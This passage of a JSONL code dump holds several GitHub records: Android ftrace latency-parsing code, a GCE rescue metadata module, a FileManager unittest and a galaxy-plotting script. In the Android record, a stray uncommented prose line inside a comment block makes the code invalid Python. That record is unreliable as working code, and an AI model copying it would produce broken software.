0.0\n\n #--------------------------------------------------------------------------\n \"\"\"\n Utility script to estimate input response latency.\n\n Inputs (Touch/Key presses) triggers USB HID report or I2C bus interrupt thats\n sent to Linux Kernel and mapped by Input driver to specific event type and\n code as standardized by Linux Input Protocol,defined by OEM-mapping\n in `linux/input.h`\n\n Next `EventHub` in Android OS layer reads the translated signals by opening\n `evdev` devices for each input device. Then Android's `InputReader`\n component then decodes the input events according to the device class and\n produces a stream of Android input events.\n\n Finally, Android's `InputReader` sends input events to the `InputDispatcher`\n which forwards them to the appropriate window.\n\n We define input latency as time from handling IRQ from touch driver (e.g.\n irq/13-fts_touc) to time when you a screen update from SurfaceFlinger\n after `DeliverInputEvent`. Technically speaking, this is referred to as\n 'input-to-display' latency.\n\n IMPORTANT: We do not account for delays from touch till when\n IRQ is triggered by touch device. 
This is typically low (<5ms)\n depending on HW.\n\n Further Reading:\n ---------------\n\n https://source.android.com/devices/input/overview.html\n https://www.kernel.org/doc/Documentation/input/event-codes.txt\n\n \"\"\"\n @requires('tracing_mark_write', 'sched_switch', 'sched_wakeup')\n @memoize\n def input_latencies(self, irq_name, interval=None):\n \"\"\"\n Returns input-to-display latencies seen in trace.\n\n IMPORTANT: Trace must be collected with 'input' and 'view' events.\n \"\"\"\n try:\n return self._input_latencies.slice(interval=interval)\n except AttributeError:\n return self._input_latency_handler(irq_name=irq_name).\\\n slice(interval=interval)\n \n @requires('tracing_mark_write')\n @memoize\n def input_events(self, task=None, interval=None):\n all_inputs = self.event_intervals(name='aq:pending:', \n task=task, \n interval=interval, \n match_exact=False)\n \n return IntervalList(filter(lambda input_event: input_event.value==1, \n all_inputs))\n \n def _input_latency_handler(self, irq_name):\n \"\"\"\n Returns a list of all input events.\n \"\"\"\n self._input_latencies = IntervalList()\n all_tasks = self._trace.cpu.task_intervals()\n all_aq_events = self.input_events()\n touch_irqs = IntervalList(filter_by_task(\n all_tasks, 'name', irq_name, 'any'))\n\n def _input_intervals():\n \"\"\"\n Generator that yields intervals when discrete input event(s)\n are read & decoded by Android `Input Reader`.\n\n x__x__x____IR___ID_ID_ID___DI_SU__DI_SU__DI_SU______\n\n x = multiple input IRQs (multi-touch translated by Android Input Framework)\n IR = Input Reader [read/decodes multiple events @ once]\n ID = Input Dispatch [dispatches each input event]\n DI = Deliver Input [ appropriate window consumes input event ]\n SU = SurfaceFlinger Screen Update due to window handling input event\n\n Please note InputReader 'iq' will be set to 1 whenever InputReader\n had an event to process. This could be disabled in some systems.\n \"\"\"\n last_timestamp = self._trace.interval.start\n for ir_event in filter_by_task(all_tasks, 'name', 'InputReader', 'any'):\n yield Interval(last_timestamp, ir_event.interval.end)\n last_timestamp = ir_event.interval.end\n\n for interval in _input_intervals():\n irqs = touch_irqs.slice(interval=interval, trimmed=False)\n # Necessary as we may be interested in a different IRQ name\n if irqs:\n # Use longest IRQ\n start_ts = max(irqs, key=lambda x: x.interval.duration).interval.start\n\n\n end_ts = start_ts\n post_ir_interval = Interval(start_ts, self._trace.duration)\n di_events = self.event_intervals(name=['deliverInputEvent', 'input'], interval=post_ir_interval)\n\n if di_events:\n # IMPORTANT: If InputDispatcher synthesizes multiple\n # events to the same application, we ignore subsequent events\n # and only parse the 1st event.
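(For instance, an illustrative case: several touch samples batched into one dispatch are counted once.)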
This is because we heuristically\n # can't determine the start of the next input event to differentiate.\n di_event = di_events[0]\n # necessary in case synthetic events are cancelled; they are\n # canceled appropriately when the events are no longer\n # being resynthesized (because the application or IME is\n # already handling them or dropping them entirely).\n # This is done by checking, before dumping input latencies, whether the\n # active input event queue length (aq) is > 1 for the same task.\n\n # For more details, see\n # https://android.googlesource.com/platform/frameworks/base.git/+\n # /f9e989d5f09e72f5c9a59d713521f37d3fdd93dd%5E!/\n\n # This returns the first interval when aq has pending event(s)\n di_event_name = getattr(di_event, 'name', None)\n if di_event_name and di_event_name == 'input':\n pfb_events = self.event_intervals(name='doComposition', interval=post_ir_interval)\n else: \n aq_event = filter_by_task(all_aq_events.slice(\n interval=post_ir_interval),\n 'pid', di_event.event.task.pid)\n \n if aq_event and aq_event.value > 0:\n post_di_start = aq_event.interval.start\n else:\n if aq_event:\n continue # if AQ event exists.\n post_di_start = di_events[0].interval.start\n \n post_di_interval = Interval(post_di_start,\n self._trace.duration)\n \n pfb_events = self.event_intervals(name='doComposition', interval=post_di_interval)\n \n if pfb_events:\n end_ts = pfb_events[0].interval.end\n if start_ts != end_ts and end_ts > start_ts and start_ts not in self._input_latencies._start_timestamps:\n input_interval = Interval(start=start_ts, end=end_ts)\n self._input_latencies.append(InputLatency(interval=input_interval,\n latency=input_interval.duration))\n\n return self._input_latencies\n\n #---------------------------------------------------------------------------\n \"\"\"\n Utility script to estimate application launch latency without instrumenting\n each app. This has been well validated and found effective for over 80 top\n apps on an Android Lollipop device. Validation was done by visually comparing the\n below markers to a screen capture of the launched app.\n\n IMPORTANT: For complex apps with a `welcome screen` displayed prior to the\n user-interactable window, e.g. games, this excludes such intervals and\n only captures up to the first displayed window.\n Typically GLSurfaces are used post-welcome screen.\n \"\"\"\n\n @memoize\n def _launched_app_events(self, interval=None):\n \"\"\"\n Upon launch, an application goes through 3 states:\n - process creation (fork from zygote)\n - bind application\n - launch (as defined in the App Lifecycle on Android OS,\n i.e. onCreate/onStart etc.)\n\n We estimate which app is launched based on\n bindApplication logged by Android.\n \"\"\"\n bindApplications = self.event_intervals(name='bindApplication')\n return bindApplications.slice(interval=interval)\n\n @memoize\n def launched_app_events(self, interval=None):\n \"\"\"\n First `bindApplication` indicates the first (actual) app-launch.\n Note that any single app-launch can initiate the launch of other\n processes (hence forks of zygotes and consequent `bindApplication`).\n \"\"\"\n return self._launched_app_events(interval=interval)\n\n @memoize\n def _start_launch_time(self, launched_event):\n \"\"\"\n Start time estimated as the first time we ever saw (i.e.
scheduled on CPU)\n the launched task.\n \"\"\"\n if launched_event:\n interval = Interval(0, launched_event.timestamp)\n return self._trace.cpu.task_intervals(task=launched_event.task,\n interval=interval)[0].interval.start\n\n @requires('tracing_mark_write')\n @memoize\n def _end_launch_time(self, launched_event, next_launched_event=None):\n \"\"\"\n End time estimated as the last `performTraversals` (screen update) that caused\n a `setTransactionState`.\n\n setTransactionState() is invoked to inform SurfaceFlinger of state changes\n of the surface; changes can be layer_state_t and Display_state\n (see native/include/private/gui/LayerState.h).\n\n layer_state_t indicates changes in position/color/depth/size/alpha/crop etc.\n Display_state indicates changes in orientation, etc.\n \"\"\"\n end_time = None\n max_end_time = self._start_launch_time(next_launched_event) \\\n if next_launched_event else self._trace.duration\n # after launch\n pl_interval = Interval(launched_event.timestamp, max_end_time)\n performTraversals = self.event_intervals(name=UI_THREAD_DRAW_NAMES,\n task=launched_event.task,\n interval=pl_interval,\n match_exact=False)\n last_end = max_end_time\n for pt_event in reversed(performTraversals):\n sts_interval = Interval(pt_event.interval.start, last_end)\n sts_events = self.event_intervals(name='setTransactionState',\n interval=sts_interval)\n # ignore 'setTransactionState' due to app close/focus switch\n # by checking 'wmUpdateFocus'\n wmuf_events = self.event_intervals(name='wmUpdateFocus',\n interval=sts_interval)\n if sts_events and not wmuf_events and sts_interval.end != max_end_time:\n end_time = sts_interval.end\n break\n last_end = pt_event.interval.start\n\n return end_time\n\n\n @requires('tracing_mark_write', 'sched_switch', 'sched_wakeup')\n @memoize\n def app_launch_latencies(self, task=None):\n \"\"\"Return launch latencies seen in trace.\"\"\"\n launch_latencies = []\n launched_events = list(self.launched_app_events())\n launched_events.append(None)\n\n for curr_app_event, next_app_event in zip(launched_events, launched_events[1:]):\n event = curr_app_event.event\n next_event = next_app_event.event if next_app_event else None\n if task and event.task != task:\n continue\n start_time, end_time = \\\n self._start_launch_time(event), self._end_launch_time(event, next_event)\n if start_time is not None and end_time is not None:\n launch_interval = Interval(start_time, end_time)\n launch_latencies.append(LaunchLatency(task=event.task,\n interval=launch_interval,\n latency=launch_interval.duration))\n return launch_latencies\n #---------------------------------------------------------------------------\n\n @coroutine\n def _context_handler(self):\n \"\"\"\n \"\"\"\n last_timestamp = self._trace.interval.start\n last_event = None\n counter_events_by_pid = defaultdict(EventList)\n\n try:\n while True:\n event = (yield)\n pid = event.task.pid\n tag = event.data.atrace_tag\n if tag is AtraceTag.CONTEXT_BEGIN:\n counter_events_by_pid[pid].append(event)\n elif tag is AtraceTag.CONTEXT_END and counter_events_by_pid[pid]:\n last_event = counter_events_by_pid[pid].pop()\n last_timestamp = last_event.timestamp\n last_pid, last_name = \\\n last_event.data.pid, last_event.data.section_name\n interval = Interval(last_timestamp, event.timestamp)\n context = Context(pid=last_pid, name=last_name,\n interval=interval, event=last_event)\n self._tmw_intervals_by_name[last_name].append(context)\n else:\n log.warn(\"Missing start marker {event}\".format(event=event))\n\n except GeneratorExit:\n # close
things off\n for pid, event_list in counter_events_by_pid.iteritems():\n for event in event_list:\n last_timestamp = event.timestamp\n interval = Interval(last_timestamp, self._trace.duration)\n if event.data.atrace_tag is not AtraceTag.CONTEXT_END:\n pid, name = event.data.pid, event.data.section_name\n context = Context(pid=pid, name=name, interval=interval, event=event)\n self._tmw_intervals_by_name[name].append(context)\n\n\n @coroutine\n def _async_event_handler(self):\n \"\"\"\n TODO: Track by cookie. This is rarely used!!!\n \"\"\"\n last_timestamp = self._trace.interval.start\n last_event = None\n # Stack them like Jason (JSON) 'PID', then 'cookie'\n counter_events_by_cookie = defaultdict(EventList)\n counter_events_by_pid = defaultdict(lambda : counter_events_by_cookie)\n\n try:\n while True:\n event = (yield)\n pid, cookie = event.data.pid, event.data.cookie\n tag = event.data.atrace_tag\n event_list = counter_events_by_pid[pid][cookie]\n if tag is AtraceTag.ASYNC_BEGIN:\n event_list.append(event)\n elif tag is AtraceTag.ASYNC_END and event_list:\n last_event = event_list.pop()\n last_timestamp = last_event.timestamp\n interval = Interval(last_timestamp, event.timestamp)\n context = Context(pid=pid, name=last_event.data.section_name,\n interval=interval, event=last_event)\n self._tmw_intervals_by_name[context.name].append(context)\n else:\n log.warn(\"Missing start marker {event}\".format(event=event))\n\n except GeneratorExit:\n # close things off\n for pid, by_name in counter_events_by_pid.iteritems():\n for cookie, event_list in by_name.iteritems():\n for event in event_list:\n last_timestamp = event.timestamp\n interval = Interval(last_timestamp, self._trace.duration)\n context = Context(pid=pid, name=event.data.section_name,\n interval=interval, event=event)\n self._tmw_intervals_by_name[context.name].append(context)\n\n @coroutine\n def _counter_handler(self):\n \"\"\"\n \"\"\"\n last_timestamp = self._trace.interval.start\n last_value = -1.0\n last_event = None\n # Stack them like Jason (JSON) 'PID', then 'Counter name'\n counter_events_by_name = defaultdict(EventList)\n counter_events_by_pid = defaultdict(lambda : counter_events_by_name)\n try:\n while True:\n event = (yield)\n pid = event.data.pid\n counter_name = event.data.counter_name\n event_list = counter_events_by_pid[pid][counter_name]\n if event_list:\n last_event = event_list.pop()\n last_timestamp = last_event.timestamp\n last_value = last_event.data.value\n event_list.append(event)\n interval = Interval(last_timestamp, event.timestamp)\n counter = Counter(pid=pid, name=counter_name, event=last_event,\n value=last_value, interval=interval)\n self._tmw_intervals_by_name[counter.name].append(counter)\n\n except GeneratorExit:\n # close things off\n for pid, by_name in counter_events_by_pid.iteritems():\n for counter_name, event_list in by_name.iteritems():\n for event in event_list:\n last_timestamp = event.timestamp\n last_value = event.data.value\n interval = Interval(last_timestamp, self._trace.duration)\n counter = Counter(pid=pid, name=counter_name, event=event,\n value=last_value, interval=interval)\n self._tmw_intervals_by_name[counter.name].append(counter)\n\n def _parse_tmw_events(self):\n \"\"\"Parse tracing_mark_write intervals\"\"\"\n context_handler = self._context_handler()\n async_event_handler = self._async_event_handler()\n counter_handler = self._counter_handler()\n\n _ATRACE_TAG_HANDLERS = {\n AtraceTag.CONTEXT_BEGIN : context_handler,\n AtraceTag.CONTEXT_END : context_handler,\n 
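# NOTE: begin/end tags share one coroutine instance, so matching markers pair up;\n # async events are further keyed by (pid, cookie) in their handler.\n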
AtraceTag.ASYNC_BEGIN : async_event_handler,\n AtraceTag.ASYNC_END : async_event_handler,\n AtraceTag.COUNTER : counter_handler,\n }\n\n def tmw_events_gen():\n filter_func = lambda event: event.tracepoint == 'tracing_mark_write'\n for event in filter(filter_func, self._events):\n yield event\n\n for event in tmw_events_gen():\n try:\n handler_func = self.__event_handlers[event.data.atrace_tag]\n except KeyError:\n handler_func = \\\n self.__event_handlers[event.data.atrace_tag] = \\\n _ATRACE_TAG_HANDLERS[event.data.atrace_tag]\n # handler_func.next() # prime the coroutine\n except AttributeError:\n log.warn(\"Unsupported event: {event}\".format(event=event))\n continue\n handler_func.send(event)\n\n # shut down the coroutines (..and we are done!)\n for handler_func in self.__event_handlers.itervalues():\n handler_func.close()","repo_name":"corakwue/ftrace","sub_path":"ftrace/components/android.py","file_name":"android.py","file_ext":"py","file_size_in_byte":27991,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"53"} +{"seq_id":"27926739354","text":"from gce_rescue.config import get_config\nfrom gce_rescue.tasks.keeper import wait_for_operation, wait_for_os_boot\nfrom typing import Dict\nimport logging\n\n_logger = logging.getLogger(__name__)\n\ndef set_metadata(vm) -> Dict:\n \"\"\"Configure Instance custom metadata.\n https://cloud.google.com/compute/docs/reference/rest/v1/instances/setMetadata\n a. Set rescue-mode= if disable=False\n b. Delete rescue-mode if disable=True\n c. Replace startup-script with local startup-script.sh content.\"\"\"\n\n startup_script_file = get_config('startup-script-file')\n device_name = vm.disks['device_name']\n with open(startup_script_file, encoding='utf-8') as file:\n file_content = file.read()\n file_content = file_content.replace('GOOGLE_DISK_NAME', device_name)\n file_content = file_content.replace('GOOGLE_TS', str(vm.ts))\n\n metadata_body = {\n 'fingerprint': vm.data['metadata']['fingerprint'],\n 'items': [{\n 'key': 'startup-script',\n 'value': file_content\n }]\n }\n _logger.info('Setting custom metadata...')\n\n operation = vm.compute.instances().setMetadata(\n **vm.project_data,\n instance = vm.name,\n body = metadata_body).execute()\n\n result = wait_for_operation(vm, oper=operation)\n return result\n\n\ndef restore_metadata_items(vm, remove_rescue_mode: bool = False) -> Dict:\n \"\"\"Restore original metadata.items after the instance is running again.\"\"\"\n\n vm.refresh_fingerprint()\n\n if not remove_rescue_mode:\n vm.backup_items.append({ 'key': 'rescue-mode', 'value': vm.ts })\n else:\n vm.backup_items.remove({ 'key': 'rescue-mode', 'value': vm.ts })\n\n metadata_body = {\n 'fingerprint': vm.data['metadata']['fingerprint'],\n 'items': vm.backup_items\n }\n _logger.info('Restoring original metadata...')\n\n # gce-rescue/issues/21 - continue after wait period timed out\n if not remove_rescue_mode:\n wait_for_os_boot(vm)\n\n operation = vm.compute.instances().setMetadata(\n **vm.project_data,\n instance = vm.name,\n body = metadata_body).execute()\n result = wait_for_operation(vm, oper=operation)\n return result\n","repo_name":"GoogleCloudPlatform/gce-rescue","sub_path":"gce_rescue/tasks/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"43670026182","text":"import unittest\nimport os\nfrom lib.FileManager import FileManager\nfrom lib.Spirit import 
Spirit\n\n\nclass FileManagerTestCase(unittest.TestCase):\n def test_unpack_inverts_output_list(self):\n test_list = [\"x\", \"y\", \"z\"]\n FileManager.output_list_to_text_file(test_list, \"tests\")\n actual_list = FileManager.unpack_text_to_python_list(\"tests/url_list.text\")\n self.assertEqual([\"x\", \"y\", \"z\"], actual_list)\n os.remove(\"tests/url_list.text\")\n\n def test_unpack_inverts_output_json(self):\n test_spirit = Spirit()\n test_spirit.name = \"test\"\n test_spirit.brand_name = \"test\"\n test_spirit.subname = \"test\"\n test_spirit.product_id = \"test\"\n test_spirit.product_uuid = \"test\"\n test_spirit.contents_liquid_volume = \"70cl\"\n test_spirit.alcohol_by_volume = \"40%\"\n test_spirit.price = 50\n test_spirit.description = \"tasteless\"\n test_spirit.facts = {\"x\": 1, \"y\": 2, \"z\": 3}\n test_spirit.flavour_style = {\"x\": 1, \"y\": 2, \"z\": 3}\n test_spirit.flavour_character = [\"x\", \"y\", \"z\"]\n test_spirit.filepath = \"tests\"\n expected_dict = test_spirit.__dict__\n\n FileManager.output_spirit_to_data_file(test_spirit, \"\")\n actual_dict = FileManager.unpack_json_file(\"tests/data.json\")\n\n self.assertDictEqual(expected_dict, actual_dict)\n os.remove(\"tests/data.json\")\n\n\nunittest.main(argv=[\"\"], verbosity=3, exit=False)\n","repo_name":"conorcarrion/Data-Collection-Pipeline","sub_path":"test_FileManager.py","file_name":"test_FileManager.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16949898454","text":"import os\nimport re\nimport sys\nimport glob\nimport scipy\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as mpatches\nplt.ioff()\n\n\n#####################\n### Parameter\n#####################\ndir_proj = \"/Users/saito/data/myproj_active/proj_ts10_phangs_ulirgs/data/\"\ndir_eps = \"/Users/saito/data/myproj_active/proj_ts10_phangs_ulirgs/eps/\"\ngalaxy = ['eso267','eso297g011','eso297g012','eso319','eso507','eso557','ic4518e','ic4518w','ic5179','iras06592','irasf10409','irasf17138','mcg02','ngc1614','ngc2369','ngc3110','ngc3256','ngc5257','ngc6240']\nphangs = [s.split(\"/\")[-1].split(\"_12m\")[0] for s in glob.glob(dir_eps + \"../data_phangs/*mom0*\")]\nylim = [0.1,100]\n\ngalname1 = [s.replace(\"eso\",\"ESO \").replace(\"ngc\",\"NGC \").replace(\"mcg\",\"MCG-\") for s in galaxy]\ngalname2 = [s.replace(\"e\",\"E\").replace(\"w\",\"W\").replace(\"ic\",\"IC\") for s in galname1]\ngalname3 = [s.replace(\"iras\",\"IRAS \").replace(\"f\",\"F\").replace(\"g\",\"-G\") for s in galname2]\ngalname4 = [s.replace(\"319\",\"319-G022\").replace(\"507\",\"507-G070\") for s in galname3]\ngalname5 = [s.replace(\"557\",\"557-G002\").replace(\"06592\",\"06592-6313\") for s in galname4]\ngalname6 = [s.replace(\"10409\",\"10409-4556\").replace(\"17138\",\"17138-1017\") for s in galname5]\ngalname = [s.replace(\"mcg02\",\"mcg-02-33-098\").replace(\"267\",\"267-G030\") for s in galname6]\n\n\n#####################\n### def\n#####################\ndef deltaMS(sfr,mass):\n\tlog_sfr_ms = (-0.32*(np.log10(mass)-np.log10(10**10))-10.17) + np.log10(mass)\n\t#ms_offset = np.log10(sfr) - log_sfr_ms\n\tms_offset = sfr / 10**log_sfr_ms\n\n\treturn ms_offset\n\n\n#####################\n### Main Procedure\n#####################\n###\ndata = np.loadtxt(\"list_sfr_stellar.txt\", dtype=\"str\")\nlirg_name = data[:,0]\nlirg_logSFR = 
10**data[:,1].astype(\"float64\")\nlirg_logMstar = 10**data[:,2].astype(\"float64\")\n#\nhdu_list = fits.open(dir_eps + \"../data_other/phangs_sample_table_v1p5.fits\", memmap=True)\nevt_data = Table(hdu_list[1].data)\nphangs_name = evt_data[\"name\"]\nphangs_logSFR = evt_data[\"props_sfr\"] # np.log10(evt_data[\"props_sfr\"])\nphangs_logMstar = evt_data[\"props_mstar\"] # np.log10(evt_data[\"props_mstar\"])\n\n\n###\nlist_all = []\nfor i in range(len(galaxy)):\n#for i in [0]:\n\tthis_galaxy = galaxy[i]\n\tprint(\"# working on \" + this_galaxy)\n\t# get image\n\tthis_mom0 = glob.glob(dir_proj + this_galaxy + \"*_mom0.fits\")[0]\n\t# get box\n\tthis_header = imhead(this_mom0,mode=\"list\")\n\tshape = this_header[\"shape\"]\n\tbox = \"0,0,\" + str(shape[0]-1) + \",\" + str(shape[1]-1)\n\t# pixel size in parsec\n\tthis_scale = 150/this_header[\"beammajor\"][\"value\"]\n\tpixsize = abs(this_header[\"cdelt1\"])*3600*180/np.pi * this_scale / 1000.\n\tpixarea = pixsize**2\n\t# galarea in kpc^2\n\tthis_data = imval(this_mom0, box=box)\n\tgalarea = sum(this_data[\"mask\"].flatten()) * pixarea\n\tradius = np.sqrt(galarea / np.pi)\n\t# get pturb\n\tdata = np.loadtxt(\"list_pturb.txt\", dtype=\"str\")\n\tthis_pturb = data[data[:,0]==this_galaxy][:,1:]\n\t# get virial\n\tdata = np.loadtxt(\"list_virial.txt\", dtype=\"str\")\n\tthis_virial = data[data[:,0]==this_galaxy][:,1:]\n\t#\n\tindex = np.where(lirg_name==this_galaxy)[0]\n\tif index:\n\t\tindex = index[0]\n\t\tstellarmass = lirg_logMstar[index]\n\t\tsfr = lirg_logSFR[index]\n\telse:\n\t\tstellarmass = 0\n\t\tsfr = 0\n\t# combine list\n\tthis_list = np.c_[np.array(this_galaxy),radius,this_pturb,this_virial,stellarmass,sfr][0]\n\tlist_all.append(this_list.tolist())\n\t#\nlist_all = np.array(list_all)\nlist_all = list_all[list_all[:,1].argsort()]\nlist_name = list_all[:,0]\nlist_r = list_all[:,1].astype(\"float64\")\nlist_pturb = list_all[:,2:6].astype(\"float64\")\nlist_virial = list_all[:,6:10].astype(\"float64\")\nlist_mass = list_all[:,10].astype(\"float64\")\nlist_sfr = list_all[:,11].astype(\"float64\")\nlist_delta = deltaMS(list_sfr,list_mass)\n\n\n###\nphangs_all = []\nfor i in range(len(phangs)):\n#for i in [0]:\n\tthis_galaxy = phangs[i]\n\tprint(\"# working on \" + this_galaxy)\n\t# get image\n\tthis_mom0 = glob.glob(dir_proj + \"../data_phangs/\" + this_galaxy + \"*_mom0_150pc.fits\")[0]\n\t# get box\n\tthis_header = imhead(this_mom0,mode=\"list\")\n\tshape = this_header[\"shape\"]\n\tbox = \"0,0,\" + str(shape[0]-1) + \",\" + str(shape[1]-1)\n\t# pixel size in parsec\n\tthis_scale = 150/this_header[\"beammajor\"][\"value\"]\n\tpixsize = abs(this_header[\"cdelt1\"])*3600*180/np.pi * this_scale / 1000.\n\tpixarea = pixsize**2\n\t# galarea in kpc^2\n\tthis_data = imval(this_mom0, box=box)\n\tgalarea = sum(this_data[\"mask\"].flatten()) * pixarea\n\tradius = np.sqrt(galarea / np.pi)\n\t# get pturb\n\tdata = np.loadtxt(\"list_pturb_phangs.txt\", dtype=\"str\")\n\tthis_pturb = data[data[:,0]==this_galaxy][:,1:]\n\t# get virial\n\tdata = np.loadtxt(\"list_virial_phangs.txt\", dtype=\"str\")\n\tthis_virial = data[data[:,0]==this_galaxy][:,1:]\n\t#\n\tindex = np.where(phangs_name==this_galaxy)[0][0]\n\tstellarmass = phangs_logMstar[index]\n\tsfr = phangs_logSFR[index]\n\t# combine list\n\tthis_list = np.c_[np.array(this_galaxy),radius,this_pturb,this_virial,stellarmass,sfr][0]\n\tphangs_all.append(this_list.tolist())\n\t#\nphangs_all = np.array(phangs_all)\nphangs_all = phangs_all[phangs_all[:,1].argsort()]\nphangs_name = 
phangs_all[:,0]\nphangs_r = phangs_all[:,1].astype(\"float64\")\nphangs_pturb = phangs_all[:,2:5].astype(\"float64\")\nphangs_virial = phangs_all[:,5:8].astype(\"float64\")\nphangs_mass = phangs_all[:,8].astype(\"float64\")\nphangs_sfr = phangs_all[:,9].astype(\"float64\")\nphangs_delta = deltaMS(phangs_sfr,phangs_mass)\n\n\n# plot\nfigure = plt.figure(figsize=(5,3))\ngs = gridspec.GridSpec(nrows=9, ncols=9)\nax = plt.subplot(gs[0:9,0:7])\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams[\"legend.fontsize\"] = 8\nplt.subplots_adjust(bottom=0.15, left=0.15, right=0.95, top=0.95)\n#\nax.scatter(phangs_mass, phangs_pturb[:,1], s=10, marker=\"o\", c=\"white\", lw=1, edgecolors=\"skyblue\", zorder=1e9, label=\"PHANGS\")\n#\nax.scatter(list_mass, list_pturb[:,1], s=20, marker=\"s\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRGs\")\nax.scatter(list_mass, list_pturb[:,3], s=40, marker=\"*\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRG centers\")\n#for i in range(len(galaxy)):\n# ax.plot([list_r[i], list_r[i]], [list_pturb[i,0], list_pturb[i,2]], lw=1, c=\"indianred\")\n#\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.xlim([10**8.9,10**12])\nplt.ylim([10**2.1,10**9.2])\nplt.xlabel(r\"log $M_{\\star}$ ($M_{\\odot}$)\")\nplt.ylabel(r\"log $P_{\\mathsf{turb,150pc}}$ (K cm$^{-3}$)\")\nplt.xticks([10**9,10**10,10**11],[9,10,11])\nplt.yticks([10**3,10**4,10**5,10**6,10**7,10**8,10**9],[3,4,5,6,7,8,9])\nplt.savefig(dir_eps+\"plot_mass_pturb.png\",dpi=200)\n\n# plot\ncut_phangs = np.where((phangs_mass>10**10.3) & (phangs_mass<10**11.1))\ncut_lirg = np.where((list_mass>10**10.3) & (list_mass<10**11.1))\n#\nfigure = plt.figure(figsize=(5,3))\ngs = gridspec.GridSpec(nrows=9, ncols=9)\nax = plt.subplot(gs[0:9,0:7])\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams[\"legend.fontsize\"] = 8\nplt.subplots_adjust(bottom=0.15, left=0.15, right=0.95, top=0.95)\n#\nax.scatter(phangs_delta[cut_phangs], phangs_pturb[:,1][cut_phangs], s=10, marker=\"o\", c=\"white\", lw=1, edgecolors=\"skyblue\", zorder=1e9, label=\"PHANGS\")\n#\nax.scatter(list_delta[cut_lirg], list_pturb[:,1][cut_lirg], s=20, marker=\"s\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRGs\")\nax.scatter(list_delta[cut_lirg], list_pturb[:,3][cut_lirg], s=40, marker=\"*\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRG centers\")\n#for i in range(len(galaxy)):\n# ax.plot([list_r[i], list_r[i]], [list_pturb[i,0], list_pturb[i,2]], lw=1, c=\"indianred\")\n#\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nax.set_xlim([10**-1.1,10**1.5])\nplt.ylim([10**2.1,10**9.2])\nplt.xlabel(r\"log $\\Delta_{\\mathsf{MS}}$\")\nplt.ylabel(r\"log $P_{\\mathsf{turb,150pc}}$ (K cm$^{-3}$)\")\nplt.xticks([10**-1,10**0,10**1],[-1,0,1])\nplt.yticks([10**3,10**4,10**5,10**6,10**7,10**8,10**9],[3,4,5,6,7,8,9])\nax.text(10**-1,10**8,\"Mass-selected sample \\n(10.3 < log $M_{\\star}$ < 11.1)\")\nplt.savefig(dir_eps+\"plot_deltams_pturb.png\",dpi=200)\n\n\n# plot\nfigure = plt.figure(figsize=(5,3))\ngs = gridspec.GridSpec(nrows=9, ncols=9)\nax = plt.subplot(gs[0:9,0:7])\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams[\"legend.fontsize\"] = 10\nplt.subplots_adjust(bottom=0.15, left=0.15, right=0.95, top=0.95)\n#\nax.scatter(phangs_mass, phangs_virial[:,1], s=10, marker=\"o\", c=\"white\", lw=1, edgecolors=\"skyblue\", zorder=1e9)\n#\nax.scatter(list_mass, list_virial[:,1], s=20, marker=\"s\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9)\nax.scatter(list_mass, 
list_virial[:,3], s=40, marker=\"*\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9)\n#for i in range(len(galaxy)):\n# ax.plot([list_r[i], list_r[i]], [list_pturb[i,0], list_pturb[i,2]], lw=1, c=\"indianred\")\n#\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.xlim([10**8.9,10**12])\nplt.ylim([1.5,40])\nplt.xlabel(r\"log $M_{\\star}$ ($M_{\\odot}$)\")\nplt.ylabel(r\"log $\\alpha_{\\mathsf{vir,150pc}}$\")\nplt.xticks([10**9,10**10,10**11],[9,10,11])\nplt.yticks([10**np.log10(3),10**1,10**np.log10(30)],[3,10,30])\nplt.savefig(dir_eps+\"plot_mass_virial.png\",dpi=200)\n\n# plot\nfigure = plt.figure(figsize=(5,3))\ngs = gridspec.GridSpec(nrows=9, ncols=9)\nax = plt.subplot(gs[0:9,0:7])\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams[\"legend.fontsize\"] = 8\nplt.subplots_adjust(bottom=0.15, left=0.15, right=0.95, top=0.95)\n#\nax.scatter(phangs_delta[cut_phangs], phangs_virial[:,1][cut_phangs], s=10, marker=\"o\", c=\"white\", lw=1, edgecolors=\"skyblue\", zorder=1e9, label=\"PHANGS\")\n#\nax.scatter(list_delta[cut_lirg], list_virial[:,1][cut_lirg], s=20, marker=\"s\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRGs\")\nax.scatter(list_delta[cut_lirg], list_virial[:,3][cut_lirg], s=40, marker=\"*\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRG centers\")\n#for i in range(len(galaxy)):\n# ax.plot([list_r[i], list_r[i]], [list_pturb[i,0], list_pturb[i,2]], lw=1, c=\"indianred\")\n#\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nax.set_xlim([10**-1.1,10**1.5])\nplt.ylim([1.5,40])\nplt.xlabel(r\"log $\\Delta_{\\mathsf{MS}}$\")\nplt.ylabel(r\"log $\\alpha_{\\mathsf{vir,150pc}}$\")\nplt.xticks([10**-1,10**0,10**1],[-1,0,1])\nplt.yticks([10**np.log10(3),10**1,10**np.log10(30)],[3,10,30])\nax.text(10**-1,23,\"Mass-selected sample \\n(10.3 < log $M_{\\star}$ < 